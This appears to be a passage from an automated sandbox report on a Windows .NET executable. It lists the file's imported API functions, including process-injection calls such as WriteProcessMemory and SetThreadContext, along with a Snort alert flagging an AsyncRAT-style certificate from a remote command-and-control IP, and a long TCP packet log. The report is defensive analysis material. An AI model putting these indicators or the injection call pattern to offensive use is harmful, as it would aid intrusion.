ADVAPI32.dll	RegCreateKeyExW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegEnumKeyExW, RegEnumValueW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, GetTokenInformation, DuplicateTokenEx, OpenThreadToken, RevertToSelf, ImpersonateLoggedOnUser, CheckTokenMembership, EventWrite, EventRegister, EventEnabled
bcrypt.dll	BCryptDestroyKey, BCryptOpenAlgorithmProvider, BCryptDecrypt, BCryptGenerateSymmetricKey, BCryptCloseAlgorithmProvider, BCryptGenRandom
KERNEL32.dll	TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, RaiseException, SetLastError, FormatMessageW, GetLastError, FreeConsole, AllocConsole, GetConsoleWindow, LocalFree, VirtualAllocEx, ResumeThread, CreateProcessW, GetThreadContext, SetThreadContext, WriteProcessMemory, ExitProcess, CloseThreadpoolIo, SetThreadErrorMode, GetModuleFileNameW, MultiByteToWideChar, GetStdHandle, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LoadLibraryExW, FileTimeToSystemTime, GetSystemTime, GetCalendarInfoEx, GetLocaleInfoEx, EnumCalendarInfoExEx, LCMapStringEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, LocaleNameToLCID, ResolveLocaleName, GetUserPreferredUILanguages, FindStringOrdinal, GetTickCount64, GetCurrentProcessorNumber, GetCurrentProcess, GetCurrentThread, WaitForSingleObject, Sleep, CreateThreadpoolWork, CloseThreadpoolWork, SubmitThreadpoolWork, CreateThreadpoolWait, SetThreadpoolWait, WaitForThreadpoolWaitCallbacks, CloseThreadpoolWait, InitializeCriticalSection, InitializeConditionVariable, DeleteCriticalSection, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, WaitForMultipleObjectsEx, GetFileAttributesExW, GetFullPathNameW, GetLongPathNameW, LocalAlloc, GetConsoleOutputCP, WideCharToMultiByte, WriteFile, GetProcAddress, RaiseFailFastException, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, EnumTimeFormatsEx, CopyFileExW, CreateFileW, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetCurrentDirectoryW, GetFileInformationByHandleEx, GetFileType, GetOverlappedResult, GetSystemDirectoryW, ReadFile, SetFileInformationByHandle, SetFilePointerEx, CreateThread, DuplicateHandle, GetThreadPriority, SetThreadPriority, GetDynamicTimeZoneInformation, GetTimeZoneInformation, CloseHandle, SetEvent, CreateEventExW, GetEnvironmentVariableW, GetExitCodeProcess, TerminateProcess, OpenProcess, GetProcessId, QueryFullProcessImageNameW, CreatePipe, GetCPInfoExW, GetConsoleCP, K32EnumProcesses, FlushProcessWriteBuffers, GetCurrentThreadId, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObjectEx, VirtualQuery, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, SuspendThread, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetTickCount, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, GetWriteWatch, ResetWriteWatch, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, InitializeSListHead, GetCurrentProcessId, SleepConditionVariableSRW, WakeAllConditionVariable, AcquireSRWLockExclusive, ReleaseSRWLockExclusive
ole32.dll	CoTaskMemAlloc, CoUninitialize, CoInitializeEx, CoTaskMemFree, CoGetApartmentType, CoWaitForMultipleHandles, CoCreateGuid
USER32.dll	LoadStringW
api-ms-win-crt-heap-l1-1-0.dll	free, malloc, _set_new_mode, calloc, _callnewh
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr, sin, modf, tan, ceil, cos, pow, floor
api-ms-win-crt-string-l1-1-0.dll	strncpy_s, _stricmp, strcpy_s, _wcsicmp, strcmp, wcsncmp
api-ms-win-crt-runtime-l1-1-0.dll	exit, _exit, _initterm, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initterm_e, _get_initial_wide_environment, _initialize_wide_environment, abort, __p___argc, _register_thread_local_exe_atexit_callback, _c_exit, _cexit, __p___wargv, _seh_filter_exe, _set_app_type, _configure_wide_argv
api-ms-win-crt-stdio-l1-1-0.dll	__stdio_common_vsprintf_s, _set_fmode, __stdio_common_vsscanf, __p__commode, __stdio_common_vfprintf, __acrt_iob_func
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Exports

Name	Ordinal	Address
DotNetRuntimeDebugHeader	1	0x140315110

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/23/24-23:02:38.369455	TCP	2035595	ET TROJAN Generic AsyncRAT Style SSL Cert	4782	49803	185.196.10.233	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 23:02:00.565438986 CEST	49674	443	192.168.2.5	23.1.237.91
Apr 23, 2024 23:02:00.565557003 CEST	49675	443	192.168.2.5	23.1.237.91
Apr 23, 2024 23:02:00.690565109 CEST	49673	443	192.168.2.5	23.1.237.91
Apr 23, 2024 23:02:10.174765110 CEST	49674	443	192.168.2.5	23.1.237.91
Apr 23, 2024 23:02:10.174777031 CEST	49675	443	192.168.2.5	23.1.237.91
Apr 23, 2024 23:02:10.299793005 CEST	49673	443	192.168.2.5	23.1.237.91
Apr 23, 2024 23:02:11.667644978 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 23, 2024 23:02:11.668044090 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 23, 2024 23:02:21.268367052 CEST	49715	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:02:21.268418074 CEST	443	49715	64.233.185.147	192.168.2.5
Apr 23, 2024 23:02:21.268482924 CEST	49715	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:02:21.269865990 CEST	49715	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:02:21.269886017 CEST	443	49715	64.233.185.147	192.168.2.5
Apr 23, 2024 23:02:21.498106003 CEST	443	49715	64.233.185.147	192.168.2.5
Apr 23, 2024 23:02:21.498651981 CEST	49715	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:02:21.498667002 CEST	443	49715	64.233.185.147	192.168.2.5
Apr 23, 2024 23:02:21.500294924 CEST	443	49715	64.233.185.147	192.168.2.5
Apr 23, 2024 23:02:21.500380039 CEST	49715	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:02:21.501458883 CEST	49715	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:02:21.501545906 CEST	443	49715	64.233.185.147	192.168.2.5
Apr 23, 2024 23:02:21.544672012 CEST	49715	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:02:21.544686079 CEST	443	49715	64.233.185.147	192.168.2.5
Apr 23, 2024 23:02:21.668483973 CEST	49715	443	192.168.2.5	64.233.185.147
Apr 23, 2024 23:02:21.685451984 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:21.685482979 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:21.685564041 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:21.685817003 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:21.685841084 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:21.685899019 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:21.686233997 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:21.686255932 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:21.686630011 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:21.686642885 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.021929026 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.023577929 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.023598909 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.024337053 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.024638891 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.024662971 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.025289059 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.025363922 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.026351929 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.026422024 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.027018070 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.027103901 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.028214931 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.028220892 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.028450966 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.028546095 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.028697968 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.028711081 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.066617966 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:22.066647053 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:22.066724062 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:22.069535971 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:22.069550037 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:22.197171926 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.197221994 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.349419117 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.349479914 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.349503994 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.349530935 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.349554062 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.349569082 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.349585056 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.349589109 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.349618912 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.349620104 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.349641085 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.349673033 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.350028992 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.350048065 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.350086927 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.350087881 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.350102901 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.350105047 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.350126028 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.350133896 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.350157022 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.350169897 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.350214005 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.432125092 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.455338001 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.455373049 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.455388069 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.455400944 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.455435991 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.455454111 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.455463886 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.455485106 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.455485106 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.455493927 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.455508947 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.455509901 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.455552101 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.455559015 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.455610991 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.455661058 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.456120968 CEST	49724	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.456134081 CEST	443	49724	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.470216036 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:22.470318079 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:22.473618984 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:22.473623037 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:22.474014997 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:22.539421082 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:22.661169052 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.661233902 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.661253929 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.661284924 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.661290884 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.661309958 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.661317110 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.661326885 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.661335945 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.661350965 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.661355019 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.661370993 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.661412001 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.661514044 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.661534071 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.661565065 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.661571026 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.661588907 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.661595106 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.661607981 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.661613941 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.661636114 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.661645889 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.766980886 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.767004013 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.767040968 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.767055035 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.767095089 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.767102957 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.767158985 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.767374992 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.767415047 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.767431974 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.767438889 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.767460108 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.767481089 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.767976046 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.768018961 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.768047094 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.768053055 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.768080950 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.768098116 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.872730017 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.872786045 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.872802973 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.872817993 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.872845888 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.872857094 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.873516083 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.873560905 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.873577118 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.873584032 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.873625040 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.873660088 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.873828888 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.873871088 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.873892069 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.873898029 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.873929024 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.873958111 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.874371052 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.874408960 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.874440908 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.874445915 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.874474049 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.874497890 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.874615908 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.874655962 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.874686003 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.874691010 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.874702930 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.874711990 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.874728918 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.874834061 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.874876022 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.874902964 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.874908924 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.874927044 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.874939919 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.874996901 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.875049114 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.875055075 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.875178099 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:22.875220060 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.875248909 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.878729105 CEST	49723	443	192.168.2.5	13.107.213.41
Apr 23, 2024 23:02:22.878745079 CEST	443	49723	13.107.213.41	192.168.2.5
Apr 23, 2024 23:02:23.033354044 CEST	49735	443	192.168.2.5	34.195.193.219
Apr 23, 2024 23:02:23.033389091 CEST	443	49735	34.195.193.219	192.168.2.5
Apr 23, 2024 23:02:23.033514977 CEST	49735	443	192.168.2.5	34.195.193.219
Apr 23, 2024 23:02:23.034724951 CEST	49735	443	192.168.2.5	34.195.193.219
Apr 23, 2024 23:02:23.034742117 CEST	443	49735	34.195.193.219	192.168.2.5
Apr 23, 2024 23:02:23.171468973 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:23.216118097 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:23.295495987 CEST	443	49735	34.195.193.219	192.168.2.5
Apr 23, 2024 23:02:23.297940016 CEST	49735	443	192.168.2.5	34.195.193.219
Apr 23, 2024 23:02:23.297972918 CEST	443	49735	34.195.193.219	192.168.2.5
Apr 23, 2024 23:02:23.299567938 CEST	443	49735	34.195.193.219	192.168.2.5
Apr 23, 2024 23:02:23.299643993 CEST	49735	443	192.168.2.5	34.195.193.219
Apr 23, 2024 23:02:23.310930967 CEST	49735	443	192.168.2.5	34.195.193.219
Apr 23, 2024 23:02:23.311158895 CEST	443	49735	34.195.193.219	192.168.2.5
Apr 23, 2024 23:02:23.427860022 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:23.427885056 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:23.427894115 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:23.427911997 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:23.427921057 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:23.427928925 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:23.427970886 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:23.427985907 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:23.428004980 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:23.428029060 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:23.428040981 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:23.428097963 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:23.428107977 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:23.428122997 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:23.428168058 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:23.437691927 CEST	49735	443	192.168.2.5	34.195.193.219
Apr 23, 2024 23:02:23.437705040 CEST	443	49735	34.195.193.219	192.168.2.5
Apr 23, 2024 23:02:23.541138887 CEST	49735	443	192.168.2.5	34.195.193.219
Apr 23, 2024 23:02:23.834320068 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:23.834331989 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:23.834342003 CEST	49725	443	192.168.2.5	13.85.23.86
Apr 23, 2024 23:02:23.834347963 CEST	443	49725	13.85.23.86	192.168.2.5
Apr 23, 2024 23:02:24.218955040 CEST	49759	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:24.218998909 CEST	443	49759	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:24.219064951 CEST	49759	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:24.220211029 CEST	49759	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:24.220226049 CEST	443	49759	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:24.481931925 CEST	443	49759	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:24.507214069 CEST	49759	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:24.507225037 CEST	443	49759	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:24.510946989 CEST	443	49759	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:24.511027098 CEST	49759	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:24.512056112 CEST	49759	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:24.512264967 CEST	443	49759	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:24.512495041 CEST	49759	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:24.512504101 CEST	443	49759	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:24.512597084 CEST	49759	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:24.560122967 CEST	443	49759	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:24.773909092 CEST	443	49759	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:24.774308920 CEST	443	49759	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:24.774379969 CEST	49759	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:24.775115013 CEST	49759	443	192.168.2.5	63.140.39.35
Apr 23, 2024 23:02:24.775131941 CEST	443	49759	63.140.39.35	192.168.2.5
Apr 23, 2024 23:02:25.542726994 CEST	49774	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:25.542767048 CEST	443	49774	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:25.542831898 CEST	49774	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:25.543231010 CEST	49774	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:25.543248892 CEST	443	49774	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:25.788985968 CEST	443	49774	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:25.789218903 CEST	49774	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:25.789251089 CEST	443	49774	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:25.790718079 CEST	443	49774	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:25.790817022 CEST	49774	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:25.792079926 CEST	49774	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:25.792191029 CEST	443	49774	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:25.792387962 CEST	49774	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:25.792401075 CEST	443	49774	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:25.946880102 CEST	49774	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:26.073765039 CEST	443	49774	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:26.074209929 CEST	443	49774	63.140.39.82	192.168.2.5
Apr 23, 2024 23:02:26.074279070 CEST	49774	443	192.168.2.5	63.140.39.82
Apr 23, 2024 23:02:26.117464066 CEST	49774	443	192.168.2.5	63.140.39.82
